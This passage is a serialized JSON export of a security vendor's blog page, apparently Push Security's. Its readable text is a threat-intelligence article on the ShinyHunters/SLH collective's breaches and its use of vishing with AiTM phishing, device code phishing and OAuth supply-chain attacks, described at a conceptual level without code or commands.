until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",{"data":16262,"content":16263,"nodeType":879},{},[16264,16268,16275,16278,16286,16289,16296],{"data":16265,"marks":16266,"value":16267,"nodeType":883},{},[],"To learn more about Push, ",{"data":16269,"content":16270,"nodeType":940},{"uri":10222},[16271],{"data":16272,"marks":16273,"value":10228,"nodeType":883},{},[16274],{"type":948},{"data":16276,"marks":16277,"value":2524,"nodeType":883},{},[],{"data":16279,"content":16280,"nodeType":940},{"uri":10234},[16281],{"data":16282,"marks":16283,"value":16285,"nodeType":883},{},[16284],{"type":948},"view our demo library",{"data":16287,"marks":16288,"value":10244,"nodeType":883},{},[],{"data":16290,"content":16291,"nodeType":940},{"uri":4772},[16292],{"data":16293,"marks":16294,"value":1751,"nodeType":883},{},[16295],{"type":948},{"data":16297,"marks":16298,"value":1350,"nodeType":883},{},[],"Device code phishing attacks have skyrocketed: here’s what you need to know","Device code phishing is seeing a huge spike in adoption in 2026, enabling attackers to steal access tokens while bypassing standard access controls.","2026-04-04T00:00:00.000Z",{"items":16303},[16304,16306],{"sys":16305,"name":3273},{"id":3272},{"sys":16307,"name":343},{"id":3276},{"items":16309},[16310],{"fullName":3930,"firstName":3931,"jobTitle":3932,"profilePicture":16311},{"url":3934},{"__typename":1967,"sys":16313,"content":16314,"title":7965,"synopsis":7966,"hashTags":59,"publishedDate":7967,"slug":7968,"tagsCollection":17023,"authorsCollection":17029},{"id":7130},{"json":16315},{"data":16316,"content":16317,"nodeType":875},{},[16318,16333,16348,16363,16368,16371,16378,16384,16390,16396,16402,16409,16412,16419,16425,16431,16437,16442,16449,16464,16470,16476,16489,16496,16520,16533,16539,16563,16570,16594,16600,16607,16622,16628,16634,16639,16645,16652,16667,16673,16689,16695,16698,16705,16711,16786,16792,16805,16808,16833,16848,16854,16860,16863,16870,16885,16891,16897,16912,16915,16922,16928,16958,16964,16979,16994,16999,17002,17008],{"data":16319,"content":16320,"nodeType":879},{},[16321,16324,16330],{"data":16322,"marks":16323,"value":7141,"nodeType":883},{},[],{"data":16325,"content":16326,"nodeType":940},{"uri":7144},[16327],{"data":16328,"marks":16329,"value":7149,"nodeType":883},{},[],{"data":16331,"marks":16332,"value":7153,"nodeType":883},{},[],{"data":16334,"content":16335,"nodeType":879},{},[16336,16339,16345],{"data":16337,"marks":16338,"value":7160,"nodeType":883},{},[],{"data":16340,"content":16341,"nodeType":940},{"uri":7163},[16342],{"data":16343,"marks":16344,"value":7168,"nodeType":883},{},[],{"data":16346,"marks":16347,"value":7172,"nodeType":883},{},[],{"data":16349,"content":16350,"nodeType":879},{},[16351,16354,16360],{"data":16352,"marks":16353,"value":7179,"nodeType":883},{},[],{"data":16355,"content":16356,"nodeType":940},{"uri":7182},[16357],{"data":16358,"marks":16359,"value":7187,"nodeType":883},{},[],{"data":16361,"marks":16362,"value":7191,"nodeType":883},{},[],{"data":16364,"content":16367,"nodeType":971},{"target":16365},{"sys":16366},{"id":7196,"type":976,"linkType":977},[],{"data":16369,"content":16370,"nodeType":905},{},[],{"data":16372,"content":16373,"nodeType":909},{},[16374],{"data":16375,"marks":16376,"value":7208,"nodeType":883},{},[16377],{"type":916},{"data":16379,"content":16380,"nodeType":879},{},[16381],{"data":16382,"marks":16383,"value":7215,"nodeType":883},{},[],{"data":16385,"content":16386,"nodeType":879},{},[16387],{"data":16388,"marks":16389,"value":7222,"nodeType":883},{},[],{"data":16391,"content":16392,"nodeType":879},{},[16393],{"data":16394,"marks":16395,"value":7229,"nodeType":883},{},[],{"data":16397,"content":16398,"nodeType":879},{},[16399],{"data":16400,"marks":16401,"value":7236,"nodeType":883},{},[],{"data":16403,"content":16404,"nodeType":879},{},[16405],{"data":16406,"marks":16407,"value":7244,"nodeType":883},{},[16408],{"type":916},{"data":16410,"content":16411,"nodeType":905},{},[],{"data":16413,"content":16414,"nodeType":909},{},[16415],{"data":16416,"marks":16417,"value":7255,"nodeType":883},{},[16418],{"type":916},{"data":16420,"content":16421,"nodeType":879},{},[16422],{"data":16423,"marks":16424,"value":7262,"nodeType":883},{},[],{"data":16426,"content":16427,"nodeType":879},{},[16428],{"data":16429,"marks":16430,"value":7269,"nodeType":883},{},[],{"data":16432,"content":16433,"nodeType":879},{},[16434],{"data":16435,"marks":16436,"value":7276,"nodeType":883},{},[],{"data":16438,"content":16441,"nodeType":971},{"target":16439},{"sys":16440},{"id":7281,"type":976,"linkType":977},[],{"data":16443,"content":16444,"nodeType":1036},{},[16445],{"data":16446,"marks":16447,"value":7290,"nodeType":883},{},[16448],{"type":916},{"data":16450,"content":16451,"nodeType":879},{},[16452,16455,16461],{"data":16453,"marks":16454,"value":7297,"nodeType":883},{},[],{"data":16456,"content":16457,"nodeType":940},{"uri":7300},[16458],{"data":16459,"marks":16460,"value":7305,"nodeType":883},{},[],{"data":16462,"marks":16463,"value":7309,"nodeType":883},{},[],{"data":16465,"content":16466,"nodeType":879},{},[16467],{"data":16468,"marks":16469,"value":7316,"nodeType":883},{},[],{"data":16471,"content":16472,"nodeType":879},{},[16473],{"data":16474,"marks":16475,"value":7323,"nodeType":883},{},[],{"data":16477,"content":16478,"nodeType":879},{},[16479,16482,16486],{"data":16480,"marks":16481,"value":7330,"nodeType":883},{},[],{"data":16483,"marks":16484,"value":7335,"nodeType":883},{},[16485],{"type":916},{"data":16487,"marks":16488,"value":7339,"nodeType":883},{},[],{"data":16490,"content":16491,"nodeType":1036},{},[16492],{"data":16493,"marks":16494,"value":7347,"nodeType":883},{},[16495],{"type":916},{"data":16497,"content":16498,"nodeType":879},{},[16499,16502,16508,16511,16517],{"data":16500,"marks":16501,"value":7354,"nodeType":883},{},[],{"data":16503,"content":16504,"nodeType":940},{"uri":1144},[16505],{"data":16506,"marks":16507,"value":7361,"nodeType":883},{},[],{"data":16509,"marks":16510,"value":7365,"nodeType":883},{},[],{"data":16512,"content":16513,"nodeType":940},{"uri":1156},[16514],{"data":16515,"marks":16516,"value":7372,"nodeType":883},{},[],{"data":16518,"marks":16519,"value":7376,"nodeType":883},{},[],{"data":16521,"content":16522,"nodeType":879},{},[16523,16526,16530],{"data":16524,"marks":16525,"value":7383,"nodeType":883},{},[],{"data":16527,"marks":16528,"value":7388,"nodeType":883},{},[16529],{"type":916},{"data":16531,"marks":16532,"value":7392,"nodeType":883},{},[],{"data":16534,"content":16535,"nodeType":879},{},[16536],{"data":16537,"marks":16538,"value":7399,"nodeType":883},{},[],{"data":16540,"content":16541,"nodeType":879},{},[16542,16545,16551,16554,16560],{"data":16543,"marks":16544,"value":7406,"nodeType":883},{},[],{"data":16546,"content":16547,"nodeType":940},{"uri":7409},[16548],{"data":16549,"marks":16550,"value":1826,"nodeType":883},{},[],{"data":16552,"marks":16553,"value":7417,"nodeType":883},{},[],{"data":16555,"content":16556,"nodeType":940},{"uri":1331},[16557],{"data":16558,"marks":16559,"value":1321,"nodeType":883},{},[],{"data":16561,"marks":16562,"value":7427,"nodeType":883},{},[],{"data":16564,"content":16565,"nodeType":1036},{},[16566],{"data":16567,"marks":16568,"value":7435,"nodeType":883},{},[16569],{"type":916},{"data":16571,"content":16572,"nodeType":879},{},[16573,16576,16582,16585,16591],{"data":16574,"marks":16575,"value":7442,"nodeType":883},{},[],{"data":16577,"content":16578,"nodeType":940},{"uri":7445},[16579],{"data":16580,"marks":16581,"value":7450,"nodeType":883},{},[],{"data":16583,"marks":16584,"value":7454,"nodeType":883},{},[],{"data":16586,"content":16587,"nodeType":940},{"uri":1343},[16588],{"data":16589,"marks":16590,"value":7461,"nodeType":883},{},[],{"data":16592,"marks":16593,"value":7465,"nodeType":883},{},[],{"data":16595,"content":16596,"nodeType":879},{},[16597],{"data":16598,"marks":16599,"value":7472,"nodeType":883},{},[],{"data":16601,"content":16602,"nodeType":1036},{},[16603],{"data":16604,"marks":16605,"value":7480,"nodeType":883},{},[16606],{"type":916},{"data":16608,"content":16609,"nodeType":879},{},[16610,16613,16619],{"data":16611,"marks":16612,"value":7487,"nodeType":883},{},[],{"data":16614,"content":16615,"nodeType":940},{"uri":2443},[16616],{"data":16617,"marks":16618,"value":7494,"nodeType":883},{},[],{"data":16620,"marks":16621,"value":7498,"nodeType":883},{},[],{"data":16623,"content":16624,"nodeType":879},{},[16625],{"data":16626,"marks":16627,"value":7505,"nodeType":883},{},[],{"data":16629,"content":16630,"nodeType":879},{},[16631],{"data":16632,"marks":16633,"value":7512,"nodeType":883},{},[],{"data":16635,"content":16638,"nodeType":971},{"target":16636},{"sys":16637},{"id":7517,"type":976,"linkType":977},[],{"data":16640,"content":16641,"nodeType":879},{},[16642],{"data":16643,"marks":16644,"value":7525,"nodeType":883},{},[],{"data":16646,"content":16647,"nodeType":1036},{},[16648],{"data":16649,"marks":16650,"value":7533,"nodeType":883},{},[16651],{"type":916},{"data":16653,"content":16654,"nodeType":879},{},[16655,16658,16664],{"data":16656,"marks":16657,"value":7540,"nodeType":883},{},[],{"data":16659,"content":16660,"nodeType":940},{"uri":1440},[16661],{"data":16662,"marks":16663,"value":7547,"nodeType":883},{},[],{"data":16665,"marks":16666,"value":7551,"nodeType":883},{},[],{"data":16668,"content":16669,"nodeType":879},{},[16670],{"data":16671,"marks":16672,"value":7558,"nodeType":883},{},[],{"data":16674,"content":16675,"nodeType":879},{},[16676,16679,16686],{"data":16677,"marks":16678,"value":7565,"nodeType":883},{},[],{"data":16680,"content":16681,"nodeType":940},{"uri":1440},[16682],{"data":16683,"marks":16684,"value":7573,"nodeType":883},{},[16685],{"type":948},{"data":16687,"marks":16688,"value":7577,"nodeType":883},{},[],{"data":16690,"content":16691,"nodeType":879},{},[16692],{"data":16693,"marks":16694,"value":7584,"nodeType":883},{},[],{"data":16696,"content":16697,"nodeType":905},{},[],{"data":16699,"content":16700,"nodeType":909},{},[16701],{"data":16702,"marks":16703,"value":7595,"nodeType":883},{},[16704],{"type":916},{"data":16706,"content":16707,"nodeType":879},{},[16708],{"data":16709,"marks":16710,"value":7602,"nodeType":883},{},[],{"data":16712,"content":16713,"nodeType":1531},{},[16714,16732,16750,16768],{"data":16715,"content":16716,"nodeType":1535},{},[16717],{"data":16718,"content":16719,"nodeType":879},{},[16720,16723,16729],{"data":16721,"marks":16722,"value":7615,"nodeType":883},{},[],{"data":16724,"content":16725,"nodeType":940},{"uri":7618},[16726],{"data":16727,"marks":16728,"value":2006,"nodeType":883},{},[],{"data":16730,"marks":16731,"value":7626,"nodeType":883},{},[],{"data":16733,"content":16734,"nodeType":1535},{},[16735],{"data":16736,"content":16737,"nodeType":879},{},[16738,16741,16747],{"data":16739,"marks":16740,"value":7636,"nodeType":883},{},[],{"data":16742,"content":16743,"nodeType":940},{"uri":7639},[16744],{"data":16745,"marks":16746,"value":7644,"nodeType":883},{},[],{"data":16748,"marks":16749,"value":7648,"nodeType":883},{},[],{"data":16751,"content":16752,"nodeType":1535},{},[16753],{"data":16754,"content":16755,"nodeType":879},{},[16756,16759,16765],{"data":16757,"marks":16758,"value":7615,"nodeType":883},{},[],{"data":16760,"content":16761,"nodeType":940},{"uri":1331},[16762],{"data":16763,"marks":16764,"value":7664,"nodeType":883},{},[],{"data":16766,"marks":16767,"value":7668,"nodeType":883},{},[],{"data":16769,"content":16770,"nodeType":1535},{},[16771],{"data":16772,"content":16773,"nodeType":879},{},[16774,16777,16783],{"data":16775,"marks":16776,"value":3786,"nodeType":883},{},[],{"data":16778,"content":16779,"nodeType":940},{"uri":7680},[16780],{"data":16781,"marks":16782,"value":7685,"nodeType":883},{},[],{"data":16784,"marks":16785,"value":7689,"nodeType":883},{},[],{"data":16787,"content":16788,"nodeType":879},{},[16789],{"data":16790,"marks":16791,"value":7696,"nodeType":883},{},[],{"data":16793,"content":16794,"nodeType":879},{},[16795,16798,16802],{"data":16796,"marks":16797,"value":7703,"nodeType":883},{},[],{"data":16799,"marks":16800,"value":7708,"nodeType":883},{},[16801],{"type":916},{"data":16803,"marks":16804,"value":7712,"nodeType":883},{},[],{"data":16806,"content":16807,"nodeType":905},{},[],{"data":16809,"content":16810,"nodeType":909},{},[16811,16815,16820,16824,16829],{"data":16812,"marks":16813,"value":7723,"nodeType":883},{},[16814],{"type":916},{"data":16816,"marks":16817,"value":7729,"nodeType":883},{},[16818,16819],{"type":891},{"type":916},{"data":16821,"marks":16822,"value":7734,"nodeType":883},{},[16823],{"type":916},{"data":16825,"marks":16826,"value":7740,"nodeType":883},{},[16827,16828],{"type":891},{"type":916},{"data":16830,"marks":16831,"value":7745,"nodeType":883},{},[16832],{"type":916},{"data":16834,"content":16835,"nodeType":879},{},[16836,16839,16845],{"data":16837,"marks":16838,"value":7752,"nodeType":883},{},[],{"data":16840,"content":16841,"nodeType":940},{"uri":7755},[16842],{"data":16843,"marks":16844,"value":7760,"nodeType":883},{},[],{"data":16846,"marks":16847,"value":7764,"nodeType":883},{},[],{"data":16849,"content":16850,"nodeType":879},{},[16851],{"data":16852,"marks":16853,"value":7771,"nodeType":883},{},[],{"data":16855,"content":16856,"nodeType":879},{},[16857],{"data":16858,"marks":16859,"value":7778,"nodeType":883},{},[],{"data":16861,"content":16862,"nodeType":905},{},[],{"data":16864,"content":16865,"nodeType":909},{},[16866],{"data":16867,"marks":16868,"value":7789,"nodeType":883},{},[16869],{"type":916},{"data":16871,"content":16872,"nodeType":879},{},[16873,16876,16882],{"data":16874,"marks":16875,"value":7796,"nodeType":883},{},[],{"data":16877,"content":16878,"nodeType":940},{"uri":7799},[16879],{"data":16880,"marks":16881,"value":7804,"nodeType":883},{},[],{"data":16883,"marks":16884,"value":7808,"nodeType":883},{},[],{"data":16886,"content":16887,"nodeType":879},{},[16888],{"data":16889,"marks":16890,"value":7815,"nodeType":883},{},[],{"data":16892,"content":16893,"nodeType":879},{},[16894],{"data":16895,"marks":16896,"value":7822,"nodeType":883},{},[],{"data":16898,"content":16899,"nodeType":879},{},[16900,16903,16909],{"data":16901,"marks":16902,"value":7829,"nodeType":883},{},[],{"data":16904,"content":16905,"nodeType":940},{"uri":7832},[16906],{"data":16907,"marks":16908,"value":7804,"nodeType":883},{},[],{"data":16910,"marks":16911,"value":1350,"nodeType":883},{},[],{"data":16913,"content":16914,"nodeType":905},{},[],{"data":16916,"content":16917,"nodeType":909},{},[16918],{"data":16919,"marks":16920,"value":7850,"nodeType":883},{},[16921],{"type":916},{"data":16923,"content":16924,"nodeType":879},{},[16925],{"data":16926,"marks":16927,"value":7857,"nodeType":883},{},[],{"data":16929,"content":16930,"nodeType":1531},{},[16931,16940,16949],{"data":16932,"content":16933,"nodeType":1535},{},[16934],{"data":16935,"content":16936,"nodeType":879},{},[16937],{"data":16938,"marks":16939,"value":7870,"nodeType":883},{},[],{"data":16941,"content":16942,"nodeType":1535},{},[16943],{"data":16944,"content":16945,"nodeType":879},{},[16946],{"data":16947,"marks":16948,"value":7880,"nodeType":883},{},[],{"data":16950,"content":16951,"nodeType":1535},{},[16952],{"data":16953,"content":16954,"nodeType":879},{},[16955],{"data":16956,"marks":16957,"value":7890,"nodeType":883},{},[],{"data":16959,"content":16960,"nodeType":879},{},[16961],{"data":16962,"marks":16963,"value":7897,"nodeType":883},{},[],{"data":16965,"content":16966,"nodeType":879},{},[16967,16970,16976],{"data":16968,"marks":16969,"value":7904,"nodeType":883},{},[],{"data":16971,"content":16972,"nodeType":940},{"uri":7182},[16973],{"data":16974,"marks":16975,"value":7911,"nodeType":883},{},[],{"data":16977,"marks":16978,"value":1350,"nodeType":883},{},[],{"data":16980,"content":16981,"nodeType":879},{},[16982,16985,16991],{"data":16983,"marks":16984,"value":7921,"nodeType":883},{},[],{"data":16986,"content":16987,"nodeType":940},{"uri":7924},[16988],{"data":16989,"marks":16990,"value":7929,"nodeType":883},{},[],{"data":16992,"marks":16993,"value":7933,"nodeType":883},{},[],{"data":16995,"content":16998,"nodeType":971},{"target":16996},{"sys":16997},{"id":7938,"type":976,"linkType":977},[],{"data":17000,"content":17001,"nodeType":905},{},[],{"data":17003,"content":17004,"nodeType":879},{},[17005],{"data":17006,"marks":17007,"value":7949,"nodeType":883},{},[],{"data":17009,"content":17010,"nodeType":879},{},[17011,17014,17020],{"data":17012,"marks":17013,"value":6671,"nodeType":883},{},[],{"data":17015,"content":17016,"nodeType":940},{"uri":4772},[17017],{"data":17018,"marks":17019,"value":6679,"nodeType":883},{},[],{"data":17021,"marks":17022,"value":6683,"nodeType":883},{},[],{"items":17024},[17025,17027],{"sys":17026,"name":3273},{"id":3272},{"sys":17028,"name":343},{"id":3276},{"items":17030},[17031],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":17032},{"url":872},{"__typename":1967,"sys":17034,"content":17036,"title":17995,"synopsis":17996,"hashTags":59,"publishedDate":7967,"slug":17997,"tagsCollection":17998,"authorsCollection":18004},{"id":17035},"3jF1fypt08TNlSoWuoMWhj",{"json":17037},{"data":17038,"content":17039,"nodeType":875},{},[17040,17066,17097,17140,17183,17189,17201,17204,17212,17261,17268,17291,17297,17300,17308,17336,17343,17351,17357,17360,17368,17375,17391,17398,17439,17446,17449,17457,17476,17531,17534,17542,17560,17578,17586,17593,17605,17617,17629,17641,17657,17665,17672,17675,17682,17688,17703,17706,17714,17732,17989],{"data":17041,"content":17042,"nodeType":879},{},[17043,17047,17053,17057,17062],{"data":17044,"marks":17045,"value":17046,"nodeType":883},{},[],"ShinyHunters and the broader SLH (",{"data":17048,"content":17049,"nodeType":940},{"uri":7618},[17050],{"data":17051,"marks":17052,"value":2006,"nodeType":883},{},[],{"data":17054,"marks":17055,"value":17056,"nodeType":883},{},[],") collective have claimed breaches at thousands of organizations over the past twelve months across retail, technology, aviation, financial services, media, gaming, and education, in what amounts to the most sustained data theft and extortion operation in recent cybercrime history. SLH's genealogy traces through a merger of Scattered Spider, Lapsus$, and ShinyHunters, all parts of ",{"data":17058,"marks":17059,"value":17061,"nodeType":883},{},[17060],{"type":916},"the Com",{"data":17063,"marks":17064,"value":17065,"nodeType":883},{},[],", a broader community of English-speaking cybercriminals with international links. ",{"data":17067,"content":17068,"nodeType":879},{},[17069,17073,17081,17085,17093],{"data":17070,"marks":17071,"value":17072,"nodeType":883},{},[],"The confirmed victim list reads like a Fortune 500 directory: Coca-Cola, Cisco, Qantas, Coinbase, ADT, Aflac, SoundCloud, Rockstar Games, Charter Communications, and recently ",{"data":17074,"content":17076,"nodeType":940},{"uri":17075},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Finstructure-confirms-data-breach-shinyhunters-claims-attack\u002F",[17077],{"data":17078,"marks":17079,"value":17080,"nodeType":883},{},[],"Instructure",{"data":17082,"marks":17083,"value":17084,"nodeType":883},{},[]," — whose breach ",{"data":17086,"content":17088,"nodeType":940},{"uri":17087},"https:\u002F\u002Fkrebsonsecurity.com\u002F2026\u002F05\u002Fcanvas-breach-disrupts-schools-colleges-nationwide\u002F",[17089],{"data":17090,"marks":17091,"value":17092,"nodeType":883},{},[],"disrupted schools and universities nationwide",{"data":17094,"marks":17095,"value":17096,"nodeType":883},{},[]," during final exams — among dozens more named publicly and likely many more that haven't been (breaches settled quickly behind closed doors don't always make it into the public eye). ShinyHunters alone claimed over 1.5 billion stolen Salesforce records from a single campaign targeting more than 1,000 organizations.",{"data":17098,"content":17099,"nodeType":879},{},[17100,17104,17112,17116,17124,17128,17136],{"data":17101,"marks":17102,"value":17103,"nodeType":883},{},[],"Additional operating clusters, including Cordial Spider and Snarky Spider (which CrowdStrike ",{"data":17105,"content":17107,"nodeType":940},{"uri":17106},"https:\u002F\u002Fcyberscoop.com\u002Fcrowdstrike-cordial-spider-snarky-spider-extortion-attacks\u002F",[17108],{"data":17109,"marks":17110,"value":17111,"nodeType":883},{},[],"characterizes as the new generation of Scattered Spider",{"data":17113,"marks":17114,"value":17115,"nodeType":883},{},[],") run parallel campaigns against different target sectors, unified not by shared infrastructure but by a shared playbook of techniques that exploit the structural weakness in modern SaaS-first organizations. ",{"data":17117,"content":17119,"nodeType":940},{"uri":17118},"https:\u002F\u002Fgithub.com\u002FPaloAltoNetworks\u002FUnit42-timely-threat-intel\u002Fblob\u002Fmain\u002F2026-03-12-Vishing-Campaigns-Lead-to-Data-Theft-and-Extortion.txt",[17120],{"data":17121,"marks":17122,"value":17123,"nodeType":883},{},[],"Unit 42 documented",{"data":17125,"marks":17126,"value":17127,"nodeType":883},{},[]," these groups moving from initial compromise to complete data exfiltration in under an hour — faster than most organizations can even begin to respond. Newer groups with links to the SLH ecosystem like CoinbaseCartel have also continued the tradition of weaponizing stolen credentials from the infostealer economy at scale, as ShinyHunters did in the ",{"data":17129,"content":17131,"nodeType":940},{"uri":17130},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fshinyhunters-claims-15-billion-salesforce-records-stolen-in-drift-hacks\u002F",[17132],{"data":17133,"marks":17134,"value":17135,"nodeType":883},{},[],"2024 Snowflake breach",{"data":17137,"marks":17138,"value":17139,"nodeType":883},{},[]," that compromised over 165 customer environments (and claimed another billion-plus records).",{"data":17141,"content":17142,"nodeType":879},{},[17143,17147,17155,17159,17167,17171,17179],{"data":17144,"marks":17145,"value":17146,"nodeType":883},{},[],"Not every SLH breach is browser-based — the Instructure breach (275 million individuals, ~330 school login portals defaced) began with a Salesforce tenant compromise in September 2025, but resurfaced in May 2026 after attackers exploited a ",{"data":17148,"content":17150,"nodeType":940},{"uri":17149},"https:\u002F\u002Fwww.bitdefender.com\u002Fen-gb\u002Fblog\u002Fbusinessinsights\u002Ftechnical-advisory-shinyhunters-breach-instructure-canvas-lms",[17151],{"data":17152,"marks":17153,"value":17154,"nodeType":883},{},[],"vulnerability affecting Canvas's Free-For-Teacher program",{"data":17156,"marks":17157,"value":17158,"nodeType":883},{},[]," (it's now been confirmed that Instructure \"",{"data":17160,"content":17162,"nodeType":940},{"uri":17161},"https:\u002F\u002Fwww.instructure.com\u002Fincident_update",[17163],{"data":17164,"marks":17165,"value":17166,"nodeType":883},{},[],"reached a settlement",{"data":17168,"marks":17169,"value":17170,"nodeType":883},{},[],"\" for the deletion of the data, and shut down the free account tier), while the Coinbase breach cost ",{"data":17172,"content":17174,"nodeType":940},{"uri":17173},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcoinbase-discloses-breach-faces-up-to-400-million-in-losses\u002F",[17175],{"data":17176,"marks":17177,"value":17178,"nodeType":883},{},[],"$180M–400M through insider bribery",{"data":17180,"marks":17181,"value":17182,"nodeType":883},{},[]," — but these are the exceptions that prove the rule. ",{"data":17184,"content":17188,"nodeType":971},{"target":17185},{"sys":17186},{"id":17187,"type":976,"linkType":977},"4qNrbDyMJIumQfdbh9YVkU",[],{"data":17190,"content":17191,"nodeType":879},{},[17192,17197],{"data":17193,"marks":17194,"value":17196,"nodeType":883},{},[17195],{"type":916},"The vast majority of SLH campaigns over the past year converge on three browser-based attack vectors: vishing combined with AiTM phishing, device code phishing exploiting account authorization flows, and OAuth supply chain attacks through compromised third-party integrators.",{"data":17198,"marks":17199,"value":17200,"nodeType":883},{},[]," Each is well-documented, each has produced confirmed victims at scale, and each is detectable or preventable through browser-layer security controls.",{"data":17202,"content":17203,"nodeType":905},{},[],{"data":17205,"content":17206,"nodeType":909},{},[17207],{"data":17208,"marks":17209,"value":17211,"nodeType":883},{},[17210],{"type":916},"Vector 1: Vishing combined with AiTM phishing",{"data":17213,"content":17214,"nodeType":879},{},[17215,17219,17226,17229,17237,17240,17247,17251,17258],{"data":17216,"marks":17217,"value":17218,"nodeType":883},{},[],"The most visible campaign right now pairs targeted voice calls with adversary-in-the-middle phishing pages — an approach that ",{"data":17220,"content":17221,"nodeType":940},{"uri":2100},[17222],{"data":17223,"marks":17224,"value":17225,"nodeType":883},{},[],"Mandiant",{"data":17227,"marks":17228,"value":12833,"nodeType":883},{},[],{"data":17230,"content":17232,"nodeType":940},{"uri":17231},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fblog\u002Fdefending-against-cordial-spider-and-snarky-spider-with-falcon-shield\u002F",[17233],{"data":17234,"marks":17235,"value":17236,"nodeType":883},{},[]," CrowdStrike",{"data":17238,"marks":17239,"value":13249,"nodeType":883},{},[],{"data":17241,"content":17242,"nodeType":940},{"uri":17118},[17243],{"data":17244,"marks":17245,"value":17246,"nodeType":883},{},[]," Unit 42",{"data":17248,"marks":17249,"value":17250,"nodeType":883},{},[]," have all documented from the incident response side, and which Push has ",{"data":17252,"content":17253,"nodeType":940},{"uri":2755},[17254],{"data":17255,"marks":17256,"value":17257,"nodeType":883},{},[],"documented from inside the attacker's own operator panels",{"data":17259,"marks":17260,"value":1350,"nodeType":883},{},[],{"data":17262,"content":17263,"nodeType":879},{},[17264],{"data":17265,"marks":17266,"value":17267,"nodeType":883},{},[],"An attacker impersonating IT support calls the target employee, establishes urgency — often citing a \"mandatory passkey rollout\" or a \"security compliance update\" — and directs them to a victim-branded AiTM phishing page (typically at a domain like \u003Ccompany>sso.com or \u003Ccompany>internal.com). The attack is processed by a live human in real time, relaying credentials and MFA codes to the legitimate identity provider as they are entered, capturing the resulting session token, and granting the attacker an authenticated session. ",{"data":17269,"content":17270,"nodeType":879},{},[17271,17275,17282,17286],{"data":17272,"marks":17273,"value":17274,"nodeType":883},{},[],"One of the reasons that this method is becoming so widespread is the commoditization of effective tools. Push's ",{"data":17276,"content":17277,"nodeType":940},{"uri":2755},[17278],{"data":17279,"marks":17280,"value":17281,"nodeType":883},{},[],"infiltration of the criminal phishing panels",{"data":17283,"marks":17284,"value":17285,"nodeType":883},{},[]," identified over 400 linked domains across four distinct infrastructure clusters. ",{"data":17287,"marks":17288,"value":17290,"nodeType":883},{},[17289],{"type":916},"This mirrors the pattern that turned AiTM phishing from a specialist capability into an industrialized market with competing PhaaS platforms, but with the added complication that voice phishing as the delivery vector makes the attack invisible to traditional anti-phishing controls at the email layer.",{"data":17292,"content":17296,"nodeType":971},{"target":17293},{"sys":17294},{"id":17295,"type":976,"linkType":977},"1Yhthl0PILGW7EmCcZUrNv",[],{"data":17298,"content":17299,"nodeType":905},{},[],{"data":17301,"content":17302,"nodeType":909},{},[17303],{"data":17304,"marks":17305,"value":17307,"nodeType":883},{},[17306],{"type":916},"Vector 2: Vishing combined with device code phishing",{"data":17309,"content":17310,"nodeType":879},{},[17311,17314,17321,17325,17332],{"data":17312,"marks":17313,"value":3786,"nodeType":883},{},[],{"data":17315,"content":17316,"nodeType":940},{"uri":7639},[17317],{"data":17318,"marks":17319,"value":17320,"nodeType":883},{},[],"ShinyHunters Salesforce campaign",{"data":17322,"marks":17323,"value":17324,"nodeType":883},{},[]," that ran through 2025 and into 2026 used device code phishing as one of its core methods, ",{"data":17326,"content":17327,"nodeType":940},{"uri":17130},[17328],{"data":17329,"marks":17330,"value":17331,"nodeType":883},{},[],"compromising over 1,000 organizations and claiming 1.5 billion stolen records",{"data":17333,"marks":17334,"value":17335,"nodeType":883},{},[]," — including an attempted extortion of Salesforce itself. The attack involved registering an attacker-controlled \"DataLoader\" application mimicking a legitimate Salesforce tool, configuring it to request broad OAuth scopes including full API access and refresh token generation, and guiding victims through the device authorization flow via vishing calls.",{"data":17337,"content":17338,"nodeType":879},{},[17339],{"data":17340,"marks":17341,"value":17342,"nodeType":883},{},[],"Device code phishing exploits the OAuth 2.0 device authorization grant — a flow designed for devices without browsers, like smart TVs, but used in a wide range of scenarios including CLI logins — by tricking users into entering a code on Microsoft's (or another identity provider's) legitimate verification page. Since the victim is usually signed into the app in their browser, there’s no login at all. They simply navigate to the app’s device code login page and enter an attacker-provided code to grant the attacker an access token. ",{"data":17344,"content":17345,"nodeType":879},{},[17346],{"data":17347,"marks":17348,"value":17350,"nodeType":883},{},[17349],{"type":916},"This is what makes device code phishing structurally different from AiTM: it defeats all MFA (including passkeys) because the attack doesn’t target the login, but the authorization layer instead.",{"data":17352,"content":17356,"nodeType":971},{"target":17353},{"sys":17354},{"id":17355,"type":976,"linkType":977},"3ElQz8sLATnR8RY5nVlBGM",[],{"data":17358,"content":17359,"nodeType":905},{},[],{"data":17361,"content":17362,"nodeType":909},{},[17363],{"data":17364,"marks":17365,"value":17367,"nodeType":883},{},[17366],{"type":916},"Vector 3: OAuth supply chain attacks through compromised integrators",{"data":17369,"content":17370,"nodeType":879},{},[17371],{"data":17372,"marks":17373,"value":17374,"nodeType":883},{},[],"The third vector does not require the attacker to phish the victim organization's employees at all. Instead, it exploits the OAuth trust relationships that organizations create when they connect third-party SaaS vendors into their environments — and the consequence is that every organization that authorized one of these integrations effectively extended its security boundary to include the vendor's own security posture.",{"data":17376,"content":17377,"nodeType":879},{},[17378,17381,17387],{"data":17379,"marks":17380,"value":3786,"nodeType":883},{},[],{"data":17382,"content":17383,"nodeType":940},{"uri":2202},[17384],{"data":17385,"marks":17386,"value":2871,"nodeType":883},{},[],{"data":17388,"marks":17389,"value":17390,"nodeType":883},{},[]," demonstrated this at scale in 2025: in an extension of the previously mentioned device code phishing campaign, the attacker compromised Salesloft's GitHub environment, used TruffleHog to find secrets, stole Drift OAuth tokens, and used them to access downstream Salesforce environments. The same pattern was later repeated at Gainsight. ",{"data":17392,"content":17393,"nodeType":879},{},[17394],{"data":17395,"marks":17396,"value":17397,"nodeType":883},{},[],"Along with the previously mentioned device code phishing attacks,  more than 1000 organizations were breached. The attackers then harvested AWS keys, Snowflake credentials, and stored passwords from breached Salesforce instances, compounding the access into progressively wider reach.",{"data":17399,"content":17400,"nodeType":879},{},[17401,17405,17412,17416,17424,17428,17435],{"data":17402,"marks":17403,"value":17404,"nodeType":883},{},[],"The same structural pattern has continued into 2026 with the Anodot supply 